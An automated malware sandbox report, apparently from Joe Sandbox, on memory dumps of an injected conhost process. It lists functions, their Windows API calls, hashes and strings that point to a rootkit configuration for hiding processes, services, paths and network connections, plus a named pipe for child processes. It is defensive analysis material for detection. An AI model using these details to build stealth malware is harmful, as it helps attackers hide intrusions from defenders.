Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 195a22ade48b9ab28047751ee69f8a0c2e9f0b61ddf168c79a6427aaa56f36f5
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: C2B17E32210E9082EFA59F2AD5007E9A3A6F744B96F449017EE0957B94FF3ACDC4C781

Function 000001D5478384B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001D5478384CC
RtlCaptureContext.NTDLL ref: 000001D5478384F9
RtlLookupFunctionEntry.NTDLL ref: 000001D547838513
RtlVirtualUnwind.NTDLL ref: 000001D547838554
IsDebuggerPresent.KERNEL32 ref: 000001D5478385A8
SetUnhandledExceptionFilter.KERNEL32 ref: 000001D5478385C5
UnhandledExceptionFilter.KERNEL32 ref: 000001D5478385D0

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 99442249b4335ca0db240c8a78c94b6b938b7755e7de67310ba8109cfc850f44
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: CE316B72205F848AEBA08F64E8403EE7365F784749F44402BDA4E57B99FF78C688C751

Function 000001D54783CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001D54783CE0B
RtlLookupFunctionEntry.NTDLL ref: 000001D54783CE23
RtlVirtualUnwind.NTDLL ref: 000001D54783CE5E
IsDebuggerPresent.KERNEL32 ref: 000001D54783CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000001D54783CEA1
UnhandledExceptionFilter.KERNEL32 ref: 000001D54783CEAC

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: 1033b3bb3d8f12235c40b3c4963881548f00943e6af065475df2d6d61bb74cba
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 36418E36214F8086EBA0CF28E8403DE73A5F789759F500216EA8D47B98EF78C199CB41

Function 000001D54783DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000001D54783DB99
FindNextFileW.KERNEL32 ref: 000001D54783DCCF
FindClose.KERNEL32 ref: 000001D54783DD0F
FindClose.KERNEL32 ref: 000001D54783DD3B

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 37b8320e96d14d2f41be2a9b39f73ff7188af9aaf6b1bbcc0a4b080f052b4d07
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 99A14732714E8049FFA09B79E4443ED6BA3E741795F044113DE98A7B99EB39C0C2C392

Function 000001D547831724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001D54783172F
HeapAlloc.KERNEL32 ref: 000001D54783173E

Part of subcall function 000001D547831264: GetProcessHeap.KERNEL32 ref: 000001D54783126A
Part of subcall function 000001D547831264: HeapAlloc.KERNEL32 ref: 000001D547831279
Part of subcall function 000001D547831264: GetProcessHeap.KERNEL32 ref: 000001D547831293
Part of subcall function 000001D547831264: HeapAlloc.KERNEL32 ref: 000001D5478312A4

Part of subcall function 000001D547831000: GetProcessHeap.KERNEL32 ref: 000001D547831006
Part of subcall function 000001D547831000: HeapAlloc.KERNEL32 ref: 000001D547831015
Part of subcall function 000001D547831000: GetProcessHeap.KERNEL32 ref: 000001D547831028
Part of subcall function 000001D547831000: HeapAlloc.KERNEL32 ref: 000001D547831037

RegOpenKeyExW.ADVAPI32 ref: 000001D5478317AE
RegOpenKeyExW.ADVAPI32 ref: 000001D5478317DB
RegCloseKey.ADVAPI32 ref: 000001D5478317F5
RegOpenKeyExW.ADVAPI32 ref: 000001D547831815
RegCloseKey.ADVAPI32 ref: 000001D547831830
RegOpenKeyExW.ADVAPI32 ref: 000001D547831850
RegCloseKey.ADVAPI32 ref: 000001D54783186B
RegOpenKeyExW.ADVAPI32 ref: 000001D54783188B
RegCloseKey.ADVAPI32 ref: 000001D5478318A6
RegOpenKeyExW.ADVAPI32 ref: 000001D5478318C6
RegCloseKey.ADVAPI32 ref: 000001D5478318E1
RegOpenKeyExW.ADVAPI32 ref: 000001D547831901
RegCloseKey.ADVAPI32 ref: 000001D54783191C
RegOpenKeyExW.ADVAPI32 ref: 000001D54783193C
RegCloseKey.ADVAPI32 ref: 000001D547831957
RegOpenKeyExW.ADVAPI32 ref: 000001D547831977
RegCloseKey.ADVAPI32 ref: 000001D547831992
RegCloseKey.ADVAPI32 ref: 000001D54783199C

Part of subcall function 000001D5478312B8: RegQueryInfoKeyW.ADVAPI32 ref: 000001D547831315
Part of subcall function 000001D5478312B8: GetProcessHeap.KERNEL32 ref: 000001D547831323
Part of subcall function 000001D5478312B8: HeapAlloc.KERNEL32 ref: 000001D547831334
Part of subcall function 000001D5478312B8: RegEnumValueW.ADVAPI32 ref: 000001D547831393
Part of subcall function 000001D5478312B8: GetProcessHeap.KERNEL32 ref: 000001D5478313DB
Part of subcall function 000001D5478312B8: HeapAlloc.KERNEL32 ref: 000001D5478313E9
Part of subcall function 000001D5478312B8: GetProcessHeap.KERNEL32 ref: 000001D547831406
Part of subcall function 000001D5478312B8: HeapFree.KERNEL32 ref: 000001D547831414
Part of subcall function 000001D5478312B8: lstrlenW.KERNEL32 ref: 000001D54783141D
Part of subcall function 000001D5478312B8: GetProcessHeap.KERNEL32 ref: 000001D54783142B
Part of subcall function 000001D5478312B8: HeapAlloc.KERNEL32 ref: 000001D547831439

Strings

udp, xrefs: 000001D547831970
tcp_local, xrefs: 000001D5478318FA
paths, xrefs: 000001D547831884
SOFTWARE\$rbx-config, xrefs: 000001D54783178E
startup, xrefs: 000001D5478317D1
process_names, xrefs: 000001D547831849
tcp_remote, xrefs: 000001D547831935
service_names, xrefs: 000001D5478318BF
pid, xrefs: 000001D54783180E

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 9fc9fa5a92ffbe061b244d59f2b5938825ab1fceffdc9d14ccecdda7bf962b14
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 1F712936710E5086EFA09F65E8946DD23A6FB88F8AF401112DE4D57B28FF79C484D781

Function 000001D5478312B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001D547831315
GetProcessHeap.KERNEL32 ref: 000001D547831323
HeapAlloc.KERNEL32 ref: 000001D547831334
RegEnumValueW.ADVAPI32 ref: 000001D547831393

Part of subcall function 000001D547831530: StrCmpIW.SHLWAPI ref: 000001D547831561

GetProcessHeap.KERNEL32 ref: 000001D5478313DB
HeapAlloc.KERNEL32 ref: 000001D5478313E9
GetProcessHeap.KERNEL32 ref: 000001D547831406
HeapFree.KERNEL32 ref: 000001D547831414
lstrlenW.KERNEL32 ref: 000001D54783141D
GetProcessHeap.KERNEL32 ref: 000001D54783142B
HeapAlloc.KERNEL32 ref: 000001D547831439
StrCpyW.SHLWAPI ref: 000001D54783145B
GetProcessHeap.KERNEL32 ref: 000001D547831472
HeapFree.KERNEL32 ref: 000001D547831480

Strings

d, xrefs: 000001D547831356

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: aa5e6b0c0b35e2da44ce3aaeef95a74741fd7f5a192b3896437aca0b61f14667
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 09515D32610F8496EBA4CF66E44839A77A2F788F99F444126DE4917718FF7DC085C781

Function 000001D54783EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000001D54783F34A,?,?,00000000,000001D54783F2CD), ref: 000001D54783EFF5
GetLastError.KERNEL32(?,?,00000000,000001D54783F2CD), ref: 000001D54783F007
LoadLibraryExW.KERNEL32(?,?,00000000,000001D54783F2CD), ref: 000001D54783F049
VirtualProtect.KERNEL32 ref: 000001D54783F0A5
VirtualProtect.KERNEL32 ref: 000001D54783F0D6
FreeLibrary.KERNEL32(?,?,00000000,000001D54783F2CD), ref: 000001D54783F11A
GetProcAddress.KERNEL32(?,?,00000000,000001D54783F2CD), ref: 000001D54783F126

Strings

api-ms-, xrefs: 000001D54783F01B
ext-ms-, xrefs: 000001D54783F02E
AppPolicyGetProcessTerminationMethod, xrefs: 000001D54783F157, 000001D54783F165

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 15219f04a8bcf768e620ff0319bb8e6dd68cfefcc5bc06107b335e4afb4f8f99
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 7E519E32701F0451EF959B6AA8143E92292FB48BB2F5807269E3D473D1FF79D48586C2

Function 000001D5478333A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PdhGetCounterInfoW.PDH ref: 000001D5478333FD
GetProcessHeap.KERNEL32 ref: 000001D547833412
HeapAlloc.KERNEL32 ref: 000001D547833420
PdhGetCounterInfoW.PDH ref: 000001D547833436
StrCmpW.SHLWAPI ref: 000001D54783344B

Part of subcall function 000001D547833950: StrCmpNW.SHLWAPI ref: 000001D547833972
Part of subcall function 000001D547833950: StrStrW.SHLWAPI ref: 000001D547833990
Part of subcall function 000001D547833950: StrToIntW.SHLWAPI ref: 000001D5478339B7

GetProcessHeap.KERNEL32 ref: 000001D547833488
HeapFree.KERNEL32 ref: 000001D547833496

Strings

\GPU Engine(*)\Running Time, xrefs: 000001D547833444

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: d0dc8ff404b7b1a1b81bb5fd52926c8eea3b102407e489cdc25860051f55d887
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 5F31F232A00F4097FFA1CF16E8043D9A3A2F798BD6F444226DE4953A24FF78C4968381

Function 000001D5478334B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PdhGetCounterInfoW.PDH ref: 000001D547833516
GetProcessHeap.KERNEL32 ref: 000001D547833527
HeapAlloc.KERNEL32 ref: 000001D547833535
PdhGetCounterInfoW.PDH ref: 000001D54783354B
StrCmpW.SHLWAPI ref: 000001D547833560

Part of subcall function 000001D547833950: StrCmpNW.SHLWAPI ref: 000001D547833972
Part of subcall function 000001D547833950: StrStrW.SHLWAPI ref: 000001D547833990
Part of subcall function 000001D547833950: StrToIntW.SHLWAPI ref: 000001D5478339B7

GetProcessHeap.KERNEL32 ref: 000001D54783358D
HeapFree.KERNEL32 ref: 000001D54783359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 000001D547833559

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 19c15f9b9ce77521138edae3db8b5ff6336b0636e20581432a9e263082ced90d
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 70314B32610F418AEF90DF26A88479967A2F784F96F444127DE4A93B24FF79C885C781

Function 000001D54780962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001D547809689

Part of subcall function 000001D54780A544: __GetUnwindTryBlock.LIBCMT ref: 000001D54780A587
Part of subcall function 000001D54780A544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001D54780A5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001D547809761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001D5478099AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001D547809ABC

Strings

csm, xrefs: 000001D547809784
csm, xrefs: 000001D54780970A
csm, xrefs: 000001D5478096A3

Memory Dump Source

Source File: 00000028.00000003.2188818508.000001D547800000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D547800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_3_1d547800000_conhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: 664f7e5bee0a010f6580fc56d633e9354375849dc810d4d9a42c9b034f3b747f
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: 59D19E32600B8486EFA0DF65D4843ED7BA6F785789F120116EF8957B9AEB34C0D0C782

Function 000001D54783A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001D54783A289

Part of subcall function 000001D54783B144: __GetUnwindTryBlock.LIBCMT ref: 000001D54783B187
Part of subcall function 000001D54783B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001D54783B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001D54783A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001D54783A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001D54783A6BC

Strings

csm, xrefs: 000001D54783A384
csm, xrefs: 000001D54783A2A3
csm, xrefs: 000001D54783A30A

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 4286ff741eaf63d7d2f9202996cad42a7547a22ed3c31d166793439a5c3b4931
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: A8D19B72604B808AEFA0DF69D4403DD77A6F75578AF100117EE8957B9AEB3AC4D0C782

Function 000001D54783104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001D5478310B1
RegEnumValueW.ADVAPI32 ref: 000001D547831117
GetProcessHeap.KERNEL32 ref: 000001D54783115A
HeapAlloc.KERNEL32 ref: 000001D547831168
GetProcessHeap.KERNEL32 ref: 000001D547831185
HeapFree.KERNEL32 ref: 000001D547831193

Strings

d, xrefs: 000001D5478310D6

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 712e6ab0d1c4180a95dc47fb3f701f661ad132f1976d80ee81743b409c384cff
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 40415E32614F84D6EBA0CF25E44439E77B2F388B99F448116DA8907758EF39C485CB81

Function 000001D547832518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001D54783252D
GetCurrentProcessId.KERNEL32 ref: 000001D547832537
CreateFileW.KERNEL32 ref: 000001D547832568
WriteFile.KERNEL32 ref: 000001D547832590
ReadFile.KERNEL32 ref: 000001D5478325AF
CloseHandle.KERNEL32 ref: 000001D5478325B8

Strings

\\.\pipe\$rbx-childproc, xrefs: 000001D547832549

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$rbx-childproc
API String ID: 166002920-1828357524
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: c9ba1e84c49741eab072dbcc24dbfc1dcfdfb5ebd9dc0a7aa3a493db2311e553
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 2D115E36614B4083EB50CF25F41839A7762F389BD6F940316EA5942BA8FF7CC188CB81

Function 000001D547807050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001D547807078
__scrt_acquire_startup_lock.LIBCMT ref: 000001D5478070CA
_RTC_Initialize.LIBCMT ref: 000001D5478070F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001D54780711E
__scrt_release_startup_lock.LIBCMT ref: 000001D547807149

Memory Dump Source

Source File: 00000028.00000003.2188818508.000001D547800000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D547800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_3_1d547800000_conhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: e6c847801b9918108a44f0f131d5db9c056801e0520ac2bd90a26862ebd7941a
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 4681DF71601EC586FFD4AB2598413D93A9BEB86782F464127AA09473D6FB38C8C1C7C3

Function 000001D547837C50 Relevance: 12.2, APIs: 8, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001D547837C78
__scrt_acquire_startup_lock.LIBCMT ref: 000001D547837CCA
_RTC_Initialize.LIBCMT ref: 000001D547837CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001D547837D1E
__scrt_release_startup_lock.LIBCMT ref: 000001D547837D49

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
